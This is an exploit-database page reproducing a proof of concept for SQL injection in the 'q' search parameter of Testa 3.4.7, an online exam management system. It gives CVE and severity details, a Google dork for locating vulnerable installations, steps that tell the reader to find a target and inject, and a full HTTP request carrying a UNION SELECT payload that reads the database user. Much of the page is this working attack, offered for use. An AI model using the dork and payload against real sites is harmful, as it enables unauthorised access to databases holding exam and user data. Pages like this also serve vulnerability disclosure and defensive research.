Advertisement






Testa 3.4.7 - Online Test Management System - 'q' SQL Injection

CVE Category Price Severity
CVE-2021-46890 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2020-07-30
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.039 0.703

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070144

Below is a copy:

Testa 3.4.7 - Online Test Management System - 'q' SQL Injection
# Exploit Title: Testa 3.4.7 - Online Test Management System - 'q' SQL Injection
# Date: 2020-07-21
# Google Dork: "Powered by Testa"
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://testa.cc
# Version: v3.4.7 [Final Version]
# Tested on: Windows/Linux
# CVE: N/A


.:: Description ::.
Testa Helps You To Take Online Exams.



.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With The Dork Above.
Step 2 - Click on List And Search Exams.
Step 3 - Inject Your Payloads in the Search Field.


.:: Sample Request ::.
POST / HTTP/1.1
Host: Target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: Target.com
Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 #

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum